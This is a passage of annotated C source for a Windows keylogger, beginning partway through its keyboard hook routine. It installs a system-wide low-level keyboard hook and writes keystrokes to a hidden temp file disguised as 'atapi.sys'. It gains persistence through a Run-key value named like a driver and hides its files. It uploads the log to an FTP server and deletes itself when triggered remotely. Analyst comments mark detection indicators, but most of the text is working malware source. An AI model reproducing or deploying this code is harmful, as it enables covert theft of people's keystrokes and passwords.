fputs("[Ctrl]", file);
break;
case VK_RCONTROL:
fputs("[Ctrl]", file);
break;
case VK_TAB:
fputs("[Tab]", file);
break;
case 0x25:
fputs("[Left Arrow]", file);
break;
case 0x26:
fputs("[Up Arrow]", file);
break;
case 0x27:
fputs("[Right Arrow]", file);
break;
case 0x28:
fputs("[Down Arrow]", file);
break;
case VK_NUMPAD0:
fputs("0", file);
break;
case VK_NUMPAD1:
fputs("1", file);
break;
case VK_NUMPAD2:
fputs("2", file);
break;
case VK_NUMPAD3:
fputs("3", file);
break;
case VK_NUMPAD4:
fputs("4", file);
break;
case VK_NUMPAD5:
fputs("5", file);
break;
case VK_NUMPAD6:
fputs("6", file);
break;
case VK_NUMPAD7:
fputs("7", file);
break;
case VK_NUMPAD8:
fputs("8", file);
break;
case VK_NUMPAD9:
fputs("9", file);
break;
case 0x6F:
fputs("/", file);
break;
case 0x6A:
fputs("*", file);
break;
case 0x6D:
fputs("-", file);
break;
case 0x6B:
fputs("+", file);
break;
case 0x6E:
fputs(",", file);
break;
}
}
// There is no break after the WM_KEYDOWN block, so control falls through into
// the WM_SYSKEYDOWN handling below and then into default.
case WM_SYSKEYDOWN:
{
DWORD vkCode = pKeyBoard->vkCode;
// Right Alt held: symbols for AltGr combinations, again from a fixed table.
if (GetAsyncKeyState(VK_RMENU))
{
switch (vkCode)
{
case 0x51:
fputs("\\", file);
break;
case 0x57:
fputs("|", file);
break;
case 0x45:
fputs("€", file);
break;
case 0xDB:
fputs("÷", file);
break;
case 0xDD:
fputs("×", file);
break;
case 0x46:
fputs("[", file);
break;
case 0x47:
fputs("]", file);
break;
case 0x4B:
fputs("ł", file);
break;
case 0x4C:
fputs("Ł", file);
break;
case 0xDE:
fputs("ß", file);
break;
case 0xDC:
fputs("¤", file);
break;
case 0x56:
fputs("@", file);
break;
case 0x42:
fputs("{", file);
break;
case 0x4E:
fputs("}", file);
break;
case 0x4D:
fputs("§", file);
break;
case 0xBC:
fputs("<", file);
break;
case 0xBE:
fputs(">", file);
break;
}
}
}
// Reached by every message (directly or by fall-through): flush and close the
// log, then hand the event to the next hook in the chain.
default:
fclose(file);
return CallNextHookEx( NULL, nCode, wParam, lParam );
}
// Not reached: every path through the switch above returns in default.
fclose(file);
return 0;
}
// KeyLogger: thread routine that installs LowLevelKeyboardProc as a
// WH_KEYBOARD_LL hook and then runs a message loop so the hook keeps being
// called. Returns 1 if the module handle cannot be obtained, otherwise 0 after
// the loop ends and the hook is removed. lpParameter is not used.
// Analyst note: the hook is registered with thread id 0, i.e. not limited to
// this program's own threads. A process with no window that installs
// WH_KEYBOARD_LL and then sits in GetMessage is the behavioural signature to
// look for in EDR telemetry.
DWORD WINAPI KeyLogger(LPVOID lpParameter)
{
HHOOK hKeyHook;
HINSTANCE hExe = GetModuleHandle(NULL);
if (hExe == NULL)
{
return 1;
}
else
{
// The returned hook handle is not checked for NULL.
hKeyHook = SetWindowsHookEx(WH_KEYBOARD_LL, (HOOKPROC)LowLevelKeyboardProc, hExe, 0);
MSG msg;
// Low-level hooks are delivered on the installing thread, which therefore has
// to keep pumping messages.
while (GetMessage(&msg, NULL, 0, 0) != 0)
{
TranslateMessage(&msg);
DispatchMessage(&msg);// dispatch the message
}
UnhookWindowsHookEx(hKeyHook);
}
return 0;
}
// StartKeyLogging: starts KeyLogger on a new thread and blocks until that
// thread ends. Returns the WaitForSingleObject result on success, or 1 when the
// thread could not be created.
// Because the wait is INFINITE and KeyLogger only returns when its message loop
// ends, the calling thread stays parked here for the life of the process.
int StartKeyLogging()
{
HANDLE hThread;
// dwThread is declared but not used; the thread id output is passed as NULL.
DWORD dwThread;
hThread = CreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)KeyLogger,NULL, 0, NULL);
if (hThread)
{
return WaitForSingleObject(hThread, INFINITE);
}
else
{
return 1;
}
}
// AutoStart: writes the running executable's full path into the current user's
// Run key so the program is started at logon. No return value is checked.
// Analyst note (persistence indicator): value name "Windows Atapi x86_64 Driver"
// under HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run. Writing to HKCU
// needs no elevation. The data points at the executable's location on disk,
// which is the file to collect during response.
void AutoStart()
{
char Driver[MAX_PATH];
HMODULE HMod;
HKEY hKey;
HMod = GetModuleHandle(NULL);
GetModuleFileNameA(HMod, Driver, sizeof(Driver));
RegOpenKeyExA(HKEY_CURRENT_USER, "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", 0, KEY_SET_VALUE, &hKey);// open the Run key for writing
// The data length is passed as MAX_PATH, not the string length, so the stored
// value covers the whole buffer, including bytes after the terminating NUL.
RegSetValueExA(hKey, "Windows Atapi x86_64 Driver", 0, REG_SZ, (const unsigned char *)Driver, MAX_PATH);// set the autostart value
RegCloseKey(hKey);
}
// File: writes a start marker to "<temp dir>atapi.sys", marks that log and the
// running executable SYSTEM|HIDDEN, then loops forever: append a timestamp to
// the log, upload the log over FTP under a generated name, sleep, repeat.
// In this listing wWinMain does not call File(); it appears only in
// commented-out lines there.
// Analyst notes:
//  - "FTPSERVER", "USERNAME" and "PASSWORD" are literal placeholder strings here;
//    a deployed sample would carry real values as plain strings.
//  - FTP sends credentials and the uploaded log in clear text, so both are
//    recoverable from a packet capture.
//  - Uploaded names start with "AttackedSuccessfuly_" and end with ".txt";
//    log markers are " - Started logging on - " and ctime-formatted timestamps.
//  - No fopen or WinINet result is checked.
void File()
{
char Driver[MAX_PATH];
HMODULE HMod;
HMod = GetModuleHandle(NULL);
GetModuleFileNameA(HMod, Driver, sizeof(Driver));
char szDir[260];
GetTempPathA(260,szDir);
strcat(szDir,"atapi.sys");
FILE *file;
file = fopen(szDir,"a+");
fputs(" - Started logging on - ", file);// start-of-session marker in the log
fclose(file);
char szName[50];
DWORD dwAttrs = GetFileAttributesA(szDir);
DWORD dwAttra = GetFileAttributesA(Driver);
//
// Taken when the executable's attribute value is non-zero and the log's
// attributes are not exactly SYSTEM|HIDDEN.
if (dwAttra && dwAttrs!= (FILE_ATTRIBUTE_SYSTEM | FILE_ATTRIBUTE_HIDDEN))
{
SetFileAttributesA(szDir, FILE_ATTRIBUTE_SYSTEM | FILE_ATTRIBUTE_HIDDEN);// hide the log file
SetFileAttributesA(Driver, FILE_ATTRIBUTE_SYSTEM | FILE_ATTRIBUTE_HIDDEN);// hide the executable itself
}
else
;
//
while(true)
{
time_t theTime = time(0);
// NOTE(review): Time is declared here and its fields are read below, but no
// call that fills it is visible in this function. The numeric suffix of an
// uploaded file name should not be treated as a reliable timestamp.
SYSTEMTIME Time;
WORD Dan = Time.wDay;
WORD Mesec = Time.wMonth;
WORD Ura = Time.wHour;
WORD Minute = Time.wMinute;
WORD Sekunde = Time.wSecond;
file = fopen(szDir,"a+");
fputs("\n", file);
fputs(ctime(&theTime), file);
fputs("\n", file);
fclose(file);
sprintf(szName, "AttackedSuccessfuly_%d%d%d%d%d.txt", Dan, Mesec, Ura, Minute, Sekunde);
HINTERNET hInternet;
HINTERNET hFtpSession;
hInternet = InternetOpen(NULL, INTERNET_OPEN_TYPE_DIRECT, NULL, NULL, 0);
hFtpSession = InternetConnectA(hInternet, "FTPSERVER", INTERNET_DEFAULT_FTP_PORT, "USERNAME", "PASSWORD", INTERNET_SERVICE_FTP, 0, 0 );
// Uploads the whole log file each time, not only what was added since the last pass.
FtpPutFileA(hFtpSession,szDir, szName, FTP_TRANSFER_TYPE_BINARY, 0);
InternetCloseHandle(hFtpSession);
InternetCloseHandle(hInternet);
// Sleep takes milliseconds: about 7.2 s between passes, i.e. a new FTP login
// every few seconds, which is a noisy and easily detected network pattern.
Sleep(7200);
}
}
// DeleteMe: remote-triggered cleanup. Downloads "destroy.txt" over FTP into the
// temp directory. If that file then exists locally, it removes destroy.txt,
// placehold.txt and the atapi.sys log, marks the executable SYSTEM|HIDDEN,
// starts the SELF_REMOVE_STRING command in a hidden cmd.exe and exits the
// process with code 1. If the file is absent the function does nothing further.
// Analyst notes:
//  - "FTPSERVERX", "USERNAME" and "PASSWORD" are literal placeholder strings here.
//  - The cleanup deletes the log artefacts, so a missing %TEMP%\atapi.sys does
//    not rule out earlier activity on a host.
//  - This function contains no registry call, so the Run-key value written by
//    AutoStart is left in place.
//  - szModuleName is the only value substituted into the delete command and no
//    assignment to it is visible in this function, so do not assume the
//    executable was actually removed from disk.
void DeleteMe()
{
TCHAR szModuleName[MAX_PATH];
TCHAR szCmd[2 * MAX_PATH];
STARTUPINFO si = {0};;// zero-initialised startup info for CreateProcess
PROCESS_INFORMATION pi = {0};// receives the child's process and thread handles
char szDir2[260];
GetTempPathA(260,szDir2);// temp directory path
strcat(szDir2,"destroy.txt");// local path of the trigger file
HINTERNET hhInternet;// WinINet session handle
HINTERNET hftpdownload;// FTP connection handle
hhInternet = InternetOpen(NULL, INTERNET_OPEN_TYPE_DIRECT, NULL, NULL, 0);// direct connection, no user agent
hftpdownload = InternetConnectA(hhInternet, "FTPSERVERX", INTERNET_DEFAULT_FTP_PORT, "USERNAME", "PASSWORD", INTERNET_SERVICE_FTP, 0, 0 );// FTP login
FtpGetFileA(hftpdownload, "destroy.txt",szDir2, FALSE,NULL,INTERNET_FLAG_TRANSFER_BINARY,NULL);// fetch the trigger file, overwriting any local copy
InternetCloseHandle(hftpdownload);
InternetCloseHandle(hhInternet);
char Driver[MAX_PATH];// full path of the running executable
HMODULE HMod;
HMod = GetModuleHandle(NULL);
GetModuleFileNameA(HMod, Driver, sizeof(Driver));
char szDir[260];
GetTempPathA(260,szDir);
strcat(szDir,"placehold.txt");// file written by PlaceHolder()
char szDir3[260];
GetTempPathA(260,szDir3);// temp directory path
strcat(szDir3,"atapi.sys");// keystroke log path
// _access mode 0 tests for existence only: the downloaded file is the trigger.
if( (_access( szDir2, 0 )) != -1 )
{
remove(szDir2);
remove(szDir);
SetFileAttributesA(szDir3,FILE_ATTRIBUTE_NORMAL);// clear hidden/system so the log can be removed
remove(szDir3);
SetFileAttributesA(Driver, FILE_ATTRIBUTE_SYSTEM | FILE_ATTRIBUTE_HIDDEN);// mark the executable hidden+system
StringCbPrintf(szCmd, 2 * MAX_PATH, SELF_REMOVE_STRING, szModuleName);
CreateProcess(NULL, szCmd, NULL, NULL, FALSE, CREATE_NO_WINDOW, NULL, NULL, &si, &pi);// run the command without a console window
CloseHandle(pi.hThread);
CloseHandle(pi.hProcess);
exit(1);
}
else
;
}
// wWinMain: GUI-subsystem entry point, so no console window is shown. Runs, in
// order: PlaceHolder (FTP download), AutoStart (Run-key persistence), DeleteMe
// (remote-triggered cleanup, which may exit the process), then StartKeyLogging,
// which blocks for as long as the keyboard hook thread runs.
// None of the four parameters is used. File() is not called here; it appears
// only in the commented-out lines below.
// Analyst note: the start-up order is network access, then a registry write,
// then hook installation. That sequence is what a sandbox or EDR timeline
// should show for this sample.
int WINAPI wWinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, PWSTR pCmdLine, int nCmdShow)
{
PlaceHolder();
AutoStart();
DeleteMe();
//handeld
//hThread1 = CreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)KeyLogger,NULL, 0, NULL);
//CreateThread(
//Thread FileFunction = new Thread(File);
//startThreading(Priority_Max);
//CFunction.Start();
StartKeyLogging();
}